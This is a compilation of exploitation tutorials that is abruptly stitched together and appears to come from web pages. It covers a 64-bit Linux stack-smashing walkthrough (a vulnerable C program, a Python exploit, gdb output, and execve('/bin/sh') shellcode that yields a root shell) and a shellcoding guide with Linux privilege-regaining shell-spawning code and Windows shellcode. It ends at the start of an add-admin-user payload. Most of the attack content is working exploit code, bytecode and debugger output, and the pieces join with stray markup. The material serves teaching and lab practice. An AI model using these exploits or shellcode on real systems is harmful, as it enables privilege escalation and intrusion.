Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that setup the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

``````int execve(const char *filename, char *const argv[], char *const envp[]);
``````

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

• General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
• Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
• Additional registers have been provided: R8 to R15.
• Pointers are 8-bytes wide.
• Push/pop on the stack are 8-bytes wide.
• Maximum canonical address size of 0x00007FFFFFFFFFFF.
• Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

``````/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */

#include <stdio.h>
#include <unistd.h>

int vuln() {
char buf[80];
int r;
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}

int main(int argc, char *argv[]) {
printf("Try to exec /bin/sh");
vuln();
return 0;
}
``````

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

``````#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)
``````

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

``````gdb-peda\$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400604 <vuln+62>:  call   0x400480 <puts@plt>
0x400609 <vuln+67>:  mov    eax,0x0
0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
0x400610 <main>: push   rbp
0x400611 <main+1>:   mov    rbp,rsp
0x400614 <main+4>:   sub    rsp,0x10
0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()
``````

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

``````gdb-peda\$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"
``````

Let’s run it again and examine the contents of RSP:

``````gdb-peda\$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400604 <vuln+62>:  call   0x400480 <puts@plt>
0x400609 <vuln+67>:  mov    eax,0x0
0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
0x400610 <main>: push   rbp
0x400611 <main+1>:   mov    rbp,rsp
0x400614 <main+4>:   sub    rsp,0x10
0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%\$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]
``````

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

``````gdb-peda\$ x/wx \$rsp
0x7fffffffe508: 0x41413741

gdb-peda\$ pattern_offset 0x41413741
1094793025 found at offset: 104
``````

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

``````#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)
``````

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

``````gdb-peda\$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()
``````

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

``````koji@pwnbox:~/classic\$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

PWN will be at 0x7fffffffeefa
``````

``````#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)
``````

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

``````koji@pwnbox:~/classic\$ sudo chown root classic
koji@pwnbox:~/classic\$ sudo chmod 4755 classic
``````

And finally, we’ll update in.txt and pipe our payload into classic:

``````koji@pwnbox:~/classic\$ python ./sploit.py
koji@pwnbox:~/classic\$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root
``````

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Background Information

• EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers on the x86 platform.
• AH, BH, CH and DH access the upper 16-bits of the GPRs.
• AL, BL, CL, and DL access the lower 8-bits of the GPRs.
• ESI and EDI are used when making Linux syscalls.
• Syscalls with 6 arguments or less are passed via the GPRs.
• XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!)
• In Windows, all function arguments are passed on the stack according to their calling convention.

• gcc
• ld
• nasm
• objdump

Optional Tools

• odfhex.c — a utility created by me to extract the shellcode from «objdump -d» and turn it into escaped hex code (very useful!).
• arwin.c — a utility created by me to find the absolute addresses of windows functions within a specified DLL.
• shellcodetest.c — this is just a copy of the c code found  below. it is a small skeleton program to test shellcode.
• exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm — the source code found in this document (the win32 shellcode was written with Windows XP SP1).

Linux Shellcoding

When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code.

`/*shellcodetest.c*/`

```char code[] = "bytecode will go here!";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}```

Making a Quick Exit

The easiest way to begin would be to demonstrate the exit syscall due to it’s simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code.

```;exit.asm
[SECTION .text]
global _start
_start:
xor eax, eax       ;exit is syscall 1
mov al, 1       ;exit is syscall 1
xor ebx,ebx     ;zero out ebx
int 0x80

```

```Take the following steps to compile and extract the byte code.
steve hanna@1337b0x:~\$ nasm -f elf exit.asm
steve hanna@1337b0x:~\$ ld -o exiter exit.o
steve hanna@1337b0x:~\$ objdump -d exiter

exiter:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       b0 01                   mov    \$0x1,%al
8048082:       31 db                   xor    %ebx,%ebx
8048084:       cd 80                   int    \$0x80
```

The bytes we need are b0 01 31 db cd 80.

Replace the code at the top with:
char code[] = «\xb0\x01\x31\xdb\xcd\x80»;

Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit.

Saying Hello

For this next piece, let’s ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space.

```;hello.asm
[SECTION .text]

global _start

_start:

jmp short ender

starter:

xor eax, eax    ;clean up the registers
xor ebx, ebx
xor edx, edx
xor ecx, ecx

mov al, 4       ;syscall write
mov bl, 1       ;stdout is 1
pop ecx         ;get the address of the string from the stack
mov dl, 5       ;length of the string
int 0x80

xor eax, eax
mov al, 1       ;exit the shellcode
xor ebx,ebx
int 0x80

ender:
call starter	;put the address of the string on the stack
db 'hello'

```

```steve hanna@1337b0x:~\$ nasm -f elf hello.asm
steve hanna@1337b0x:~\$ ld -o hello hello.o
steve hanna@1337b0x:~\$ objdump -d hello

hello:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       eb 19                   jmp    804809b

08048082 <starter>:
8048082:       31 c0                   xor    %eax,%eax
8048084:       31 db                   xor    %ebx,%ebx
8048086:       31 d2                   xor    %edx,%edx
8048088:       31 c9                   xor    %ecx,%ecx
804808a:       b0 04                   mov    \$0x4,%al
804808c:       b3 01                   mov    \$0x1,%bl
804808e:       59                      pop    %ecx
804808f:       b2 05                   mov    \$0x5,%dl
8048091:       cd 80                   int    \$0x80
8048093:       31 c0                   xor    %eax,%eax
8048095:       b0 01                   mov    \$0x1,%al
8048097:       31 db                   xor    %ebx,%ebx
8048099:       cd 80                   int    \$0x80

0804809b <ender>:
804809b:       e8 e2 ff ff ff          call   8048082
80480a0:       68 65 6c 6c 6f          push   \$0x6f6c6c65

Replace the code at the top with:
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\
"\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f";```
```
At this point we have a fully functional piece of shellcode that outputs to stdout.
Now that dynamic string addressing has been demonstrated as well as the ability to zero
out registers, we can move on to a piece of code that gets us a shell.

```

Spawning a Shell

This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system(«/bin/sh») would have been a lot simpler right? Well the only problem with that approach is the fact that system always drops privileges.

execve (const char *filename, const char** argv, const char** envp);

So, the second two argument expect pointers to pointers. That’s why I load the address of the «/bin/sh» into the string memory and then pass the address of the string memory to the function. When the pointers are dereferenced the target memory will be the «/bin/sh» string.

```;shellex.asm
[SECTION .text]

global _start

_start:
xor eax, eax
mov al, 70              ;setreuid is syscall 70
xor ebx, ebx
xor ecx, ecx
int 0x80

jmp short ender

starter:

pop ebx                 ;get the address of the string
xor eax, eax

mov [ebx+7 ], al        ;put a NULL where the N is in the string
mov [ebx+8 ], ebx       ;put the address of the string to where the
;AAAA is
mov [ebx+12], eax       ;put 4 null bytes into where the BBBB is
mov al, 11              ;execve is syscall 11
int 0x80                ;call the kernel, WE HAVE A SHELL!

ender:
call starter
db '/bin/shNAAAABBBB'

```

```steve hanna@1337b0x:~\$ nasm -f elf shellex.asm
steve hanna@1337b0x:~\$ ld -o shellex shellex.o
steve hanna@1337b0x:~\$ objdump -d shellex

shellex:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       31 c0                   xor    %eax,%eax
8048082:       b0 46                   mov    \$0x46,%al
8048084:       31 db                   xor    %ebx,%ebx
8048086:       31 c9                   xor    %ecx,%ecx
8048088:       cd 80                   int    \$0x80
804808a:       eb 16                   jmp    80480a2

0804808c :
804808c:       5b                      pop    %ebx
804808d:       31 c0                   xor    %eax,%eax
804808f:       88 43 07                mov    %al,0x7(%ebx)
8048092:       89 5b 08                mov    %ebx,0x8(%ebx)
8048095:       89 43 0c                mov    %eax,0xc(%ebx)
8048098:       b0 0b                   mov    \$0xb,%al
804809a:       8d 4b 08                lea    0x8(%ebx),%ecx
804809d:       8d 53 0c                lea    0xc(%ebx),%edx
80480a0:       cd 80                   int    \$0x80

080480a2 :
80480a2:       e8 e5 ff ff ff          call   804808c
80480a7:       2f                      das
80480a8:       62 69 6e                bound  %ebp,0x6e(%ecx)
80480ab:       2f                      das
80480ac:       73 68                   jae    8048116 <ender+0x74>
80480ae:       58                      pop    %eax
80480af:       41                      inc    %ecx
80480b0:       41                      inc    %ecx
80480b1:       41                      inc    %ecx
80480b2:       41                      inc    %ecx
80480b3:       42                      inc    %edx
80480b4:       42                      inc    %edx
80480b5:       42                      inc    %edx
80480b6:       42                      inc    %edx
Replace the code at the top with:

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
"\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\
"\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\
"\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";</ender+0x74>```
```This code produces a fully functional shell when injected into an exploit
and demonstrates most of the skills needed to write successful shellcode. Be
aware though, the better one is at assembly, the more functional, robust,
and most of all evil, one's code will be.```

Windows Shellcoding

Sleep is for the Weak!

In order to write successful code, we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses. For this example we just want a thread to sleep for an allotted amount of time. Let’s load up arwin (found above) and get started. Remember, the only module guaranteed to be mapped into the processes address space is kernel32.dll. So for this example, Sleep seems to be the simplest function, accepting the amount of time the thread should suspend as its only argument.

```G:\> arwin kernel32.dll Sleep
arwin - win32 address resolution program - by steve hanna - v.01
Sleep is located at 0x77e61bea in kernel32.dll

```

```;sleep.asm
[SECTION .text]

global _start

_start:
xor eax,eax
mov ebx, 0x77e61bea ;address of Sleep
mov ax, 5000        ;pause for 5000ms
push eax
call ebx        ;Sleep(ms);

```

```steve hanna@1337b0x:~\$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleep
sleep:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       31 c0                   xor    %eax,%eax
8048082:       bb ea 1b e6 77          mov    \$0x77e61bea,%ebx
8048087:       66 b8 88 13             mov    \$0x1388,%ax
804808b:       50                      push   %eax
804808c:       ff d3                   call   *%ebx

Replace the code at the top with:
char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3";
```

When this code is inserted it will cause the parent thread to suspend for five seconds (note: it will then probably crash because the stack is smashed at this point :-D).

A Message to say «Hey»

This second example is useful in the fact that it will show a shellcoder how to do several things within the bounds of windows shellcoding. Although this example does nothing more than pop up a message box and say «hey», it demonstrates absolute addressing as well as the dynamic addressing using LoadLibrary and GetProcAddress. The library functions we will be using are LoadLibraryA, GetProcAddress, MessageBoxA, and ExitProcess (note: the A after the function name specifies we will be using a normal character set, as opposed to a W which would signify a wide character set; such as unicode). Let’s load up arwin and find the addresses we need to use. We will not retrieve the address of MessageBoxA at this time, we will dynamically load that address.

```G:\>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll

arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

```

```;msgbox.asm
[SECTION .text]

global _start

_start:
;eax holds return value
;ecx will hold string pointers
;edx will hold NULL

xor eax,eax
xor ebx,ebx			;zero out the registers
xor ecx,ecx
xor edx,edx

jmp short GetLibrary
LibraryReturn:
pop ecx				;get the library string
mov [ecx + 10], dl		;insert NULL
push ecx			;beginning of user32.dll
call ebx			;eax will hold the module handle

jmp short FunctionName
FunctionReturn:

pop ecx				;get the address of the Function string
xor edx,edx
mov [ecx + 11],dl		;insert NULL
push ecx
push eax
call ebx			;eax now holds the address of MessageBoxA

jmp short Message
MessageReturn:
pop ecx				;get the message string
xor edx,edx
mov [ecx+3],dl			;insert the NULL

xor edx,edx

push edx			;MB_OK
push ecx			;title
push ecx			;message
push edx			;NULL window handle

ender:
xor edx,edx
push eax
mov eax, 0x77e798fd 		;exitprocess(exitcode);
call eax			;exit cleanly so we don't crash the parent program

;the N at the end of each string signifies the location of the NULL
;character that needs to be inserted

GetLibrary:
call LibraryReturn
db 'user32.dllN'
FunctionName
call FunctionReturn
db 'MessageBoxAN'
Message
call MessageReturn
db 'HeyN'

```

```[steve hanna@1337b0x]\$ nasm -f elf msgbox.asm; ld -o msgbox msgbox.o; objdump -d msgbox

msgbox:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       31 c0                   xor    %eax,%eax
8048082:       31 db                   xor    %ebx,%ebx
8048084:       31 c9                   xor    %ecx,%ecx
8048086:       31 d2                   xor    %edx,%edx```
``` 8048088:       eb 37                   jmp    80480c1

0804808a :
804808a:       59                      pop    %ecx
804808b:       88 51 0a                mov    %dl,0xa(%ecx)
804808e:       bb 61 d9 e7 77          mov    \$0x77e7d961,%ebx
8048093:       51                      push   %ecx
8048094:       ff d3                   call   *%ebx
8048096:       eb 39                   jmp    80480d1

08048098 :
8048098:       59                      pop    %ecx
8048099:       31 d2                   xor    %edx,%edx
804809b:       88 51 0b                mov    %dl,0xb(%ecx)
804809e:       51                      push   %ecx
804809f:       50                      push   %eax
80480a0:       bb 32 b3 e7 77          mov    \$0x77e7b332,%ebx
80480a5:       ff d3                   call   *%ebx
80480a7:       eb 39                   jmp    80480e2

080480a9 :
80480a9:       59                      pop    %ecx
80480aa:       31 d2                   xor    %edx,%edx
80480ac:       88 51 03                mov    %dl,0x3(%ecx)
80480af:       31 d2                   xor    %edx,%edx
80480b1:       52                      push   %edx
80480b2:       51                      push   %ecx
80480b3:       51                      push   %ecx
80480b4:       52                      push   %edx
80480b5:       ff d0                   call   *%eax

080480b7 :
80480b7:       31 d2                   xor    %edx,%edx
80480b9:       50                      push   %eax
80480ba:       b8 fd 98 e7 77          mov    \$0x77e798fd,%eax
80480bf:       ff d0                   call   *%eax

080480c1 :
80480c1:       e8 c4 ff ff ff          call   804808a
80480c6:       75 73                   jne    804813b <message+0x59>
80480c8:       65                      gs
80480c9:       72 33                   jb     80480fe <message+0x1c>
80480cb:       32 2e                   xor    (%esi),%ch
80480cd:       64                      fs
80480ce:       6c                      insb   (%dx),%es:(%edi)
80480cf:       6c                      insb   (%dx),%es:(%edi)
80480d0:       4e                      dec    %esi

080480d1 :
80480d1:       e8 c2 ff ff ff          call   8048098
80480d6:       4d                      dec    %ebp
80480d7:       65                      gs
80480d8:       73 73                   jae    804814d <message+0x6b>
80480da:       61                      popa
80480dc:       65                      gs
80480dd:       42                      inc    %edx
80480de:       6f                      outsl  %ds:(%esi),(%dx)
80480df:       78 41                   js     8048122 <message+0x40>
80480e1:       4e                      dec    %esi

080480e2 :
80480e2:       e8 c2 ff ff ff          call   80480a9
80480e7:       48                      dec    %eax
80480e8:       65                      gs
80480e9:       79 4e                   jns    8048139 <message+0x57>
</message+0x57></message+0x40></message+0x6b></message+0x1c></message+0x59>```
```Replace the code at the top with:
char code[] =   "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";

```

This example, while not useful in the fact that it only pops up a message box, illustrates several important concepts when using windows shellcoding. Static addressing as used in most of the example above can be a powerful (and easy) way to whip up working shellcode within minutes. This example shows the process of ensuring that certain DLLs are loaded into a process space. Once the address of the MessageBoxA function is obtained ExitProcess is called to make sure that the program ends without crashing.

This third example is actually quite a bit simpler than the previous shellcode, but this code allows the exploiter to add a user to the remote system and give that user administrative privileges. This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess. Note: the idea for this code was taken from the Metasploit project mentioned above. The difference between the shellcode is that this code is quite a bit smaller than its counterpart, and it can be made even smaller by removing the ExitProcess function!

```G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

